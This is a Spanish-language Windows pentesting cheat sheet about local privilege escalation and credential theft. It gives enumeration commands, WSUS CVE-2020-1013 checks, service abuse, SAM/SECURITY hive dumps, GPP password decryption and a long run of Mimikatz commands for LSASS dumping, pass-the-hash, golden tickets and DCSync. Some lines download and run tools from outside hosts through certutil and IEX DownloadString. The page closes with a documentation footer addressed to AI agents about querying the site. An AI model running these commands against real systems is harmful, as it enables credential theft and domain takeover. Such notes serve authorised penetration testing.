# Windows

## <mark style="color:red;">Enumeración automatizada</mark>

### WinPEAS

<https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS>

Última versión y binarios: <https://github.com/peass-ng/PEASS-ng/releases>

{% code overflow="wrap" %}

```powershell
iwr https://github.com/peass-ng/PEASS-ng/releases/download/20241007-05f777b2/winPEASx64.exe -outputfile winpeas64.exe
```

{% endcode %}

Otras formas de transferir ficheros: [Misc](/pentesting-en-infraestructuras/misc.md#windows)

Ejecución básica:

```bash
.\winPEASx64.exe
```

Para entornos más restringidos, se puede usar un loader que permita cargar y ejecutar en memoria el programa. Por ejemplo:

[#silentloader](#silentloader "mention")

```powershell
.\sloader.exe -f C:\Pentest\Tools\winPEASx64.exe -p notcolor log
```

### PowerUp

<https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1>

```powershell
. C:\AD\Tools\PowerUp.ps1
```

{% code overflow="wrap" %}

```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
```

{% endcode %}

Se enumeran las posibles vías de elevación de privilegios y se exporta la información a un fichero html:

```powershell
Invoke-AllChecks -HTMLReport
```

### PrivescCheck

<https://github.com/itm4n/PrivescCheck>

```
git clone "https://github.com/itm4n/PrivescCheck.git"
```

{% code overflow="wrap" %}

```powershell
Invoke-PrivescCheck -Extended -Audit -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML,CSV,XML
```

{% endcode %}

## <mark style="color:red;">Vulnerabilidades</mark>

### Actualizaciones vía WSUS

WSUS (Windows Server Update Services) es un servicio que permite gestionar la distribución de actualizaciones en redes corporativas con sistemas Windows.

Es un servidor centralizado que descarga y distribuye parches de seguridad y actualizaciones en los clientes de la red local.

Para comprobar si el servidor WSUS es vulnerable a <mark style="color:red;">**CVE-2020-1013**</mark>, se tienen que dar dos condiciones:

1. El servidor WSUS tiene que <mark style="color:red;">**utilizar el protocolo HTTP**</mark> en vez de HTTPS. Para comprobar cuál servidor WSUS se está utilizando:

```powershell
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
```

```
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
      WUServer    REG_SZ    http://xtormin.local:8530
```

2. Que el uso del servidor WSUS esté activado. Para ello, el  resultado del siguiente <mark style="color:red;">**registro debe ser igual a 0**</mark>:

```
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
```

**Writeup de la investigación y presentación en la BlackHat:**

* Presentación: <https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update.pdf>
* Investigación: <https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update-wp.pdf>

<mark style="color:blue;">**Otras referencias:**</mark>

* <https://gosecure.ai/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/>
* <https://learn.microsoft.com/es-es/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus>
* <https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus:~:text=ft%20Name%2CRoot-,WSUS,-You%20can%20compromise>

## <mark style="color:red;">Escalada de privilegios</mark>

### Equipo conectado con Azure

{% code overflow="wrap" %}

```bash
wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
```

{% endcode %}

Otras formas de transferir ficheros: [Misc](/pentesting-en-infraestructuras/misc.md#windows)

```powershell
Azure-ADConnect -server 127.0.0.1 -db ADSync
```

### Servicio modificable

**Identificación**

<table><thead><tr><th width="148">Herramienta</th><th>Comando</th></tr></thead><tbody><tr><td>PowerUp</td><td><pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell">Get-ModifiableService
</code></pre></td></tr></tbody></table>

**Ejemplo de explotación**

<table><thead><tr><th width="148">Herramienta</th><th>Comando</th></tr></thead><tbody><tr><td>PowerUp</td><td><pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell">Invoke-ServiceAbuse -Name 'WebServer' -UserName 'xtormincorp\xtormin' -Verbose
</code></pre></td></tr></tbody></table>

### Máquinas del dominio con acceso privilegiado

Buscar máquinas donde el usuario tiene permisos de administrador local:

```powershell
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
```

* winrs:

```powershell
winrs -r:<Nombre de la máquina> cmd
set username
set computername
```

* PSSession:

{% code overflow="wrap" %}

```powershell
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
$env:username
```

{% endcode %}

## <mark style="color:red;">Extracción de credenciales</mark>

### Obtención de SAM, SYSTEM, SECURITY

```
reg save HKLM\SAM C:\WINDOWS\Temp\sam.dmp
reg save HKLM\SYSTEM C:\WINDOWS\Temp\system.dmp
reg save HKLM\security C:\WINDOWS\Temp\security.dmp
```

```
samdump2 system sam
```

{% code overflow="wrap" %}

```bash
/home/kali/tools/impacket/examples/secretsdump.py -sam sam.dmp -system system.dmp -security security.dmp LOCAL
```

{% endcode %}

### GPP - Group Password Policy

{% code overflow="wrap" %}

```bash
cd %windir%\system32\grouppolicy
```

{% endcode %}

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="jdBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
gpp-decrypt jdBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
```

{% endcode %}

### Mimikatz

{% code overflow="wrap" %}

```powershell
certutil -urlcache -split -f http://192.168.119.142/mimikatz.exe C:\Windows\Temp\mimikatz.exe && C:\Windows\Temp\mimikatz.exe

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds
```

{% endcode %}

<pre class="language-powershell"><code class="lang-powershell">privilege::debug
log
log customlogfilename.log
<strong>
</strong><strong>token::elevate
</strong></code></pre>

#### Dump LSASS

```powershell
privilege::debug
token::elevate
sekurlsa::logonpasswords
```

#### Seckurlsa

{% code overflow="wrap" %}

```powershell
sekurlsa::ekeys

sekurlsa::logonpasswords
sekurlsa::logonPasswords full

sekurlsa::tickets
sekurlsa::tickets /export

sekurlsa::tspkg

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:4c13687d23a3a88e57fc9ef8bb4cdf2f /run:cmd

sekurlsa::minidump c:\Windows\Temp\lsass.dmp
```

{% endcode %}

#### Kerberos

{% code overflow="wrap" %}

```powershell
kerberos::list /export

kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
```

{% endcode %}

#### DSync

```powershell
lsadump::dcsync /user:domain\krbtgt /domain:xor.com
lsadump::dcsync /domain:xor.com /all /csv
lsadump::dcsync /domain:xor.com /user:administrator

lsadump::lsa /inject
```

```powershell
token::elevate
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
```

#### Vault

```powershell
vault::cred
vault::cred /patch
vault::list
```

#### Terminal Services

```powershell
ts::multirdp
ts::logonpasswords
```

#### Pass-the-Hash

{% code overflow="wrap" %}

```powershell
sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:cc36cf7a8514893efccd332446158b1a

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:{NTLM_hash} /run:cmd.exe
```

{% endcode %}

### Credenciales en eventos de logs

Se parsean los logs de Windows Event ID 4688 para extraer credenciales:

```powershell
nxc smb 192.168.1.100 -u $USER -p $PASS -M eventlog_creds
```

## <mark style="color:red;">Referencias</mark>

* WADComs - <https://wadcoms.github.io/#+Privilege%20Escalation>
* Track 3 15 Goodbye Obfuscation Hello Invisi Shell Hiding Your Powershell Script in Plain Sight Omer - <https://www.youtube.com/watch?v=Y3oMEiySxcc>
* <https://www.atomicredteam.io/atomic-red-team>
* <https://etchedshell.medium.com/powerup-experience-42f3d7904e79>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.xtormin.com/pentesting-en-infraestructuras/red-interna/windows.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.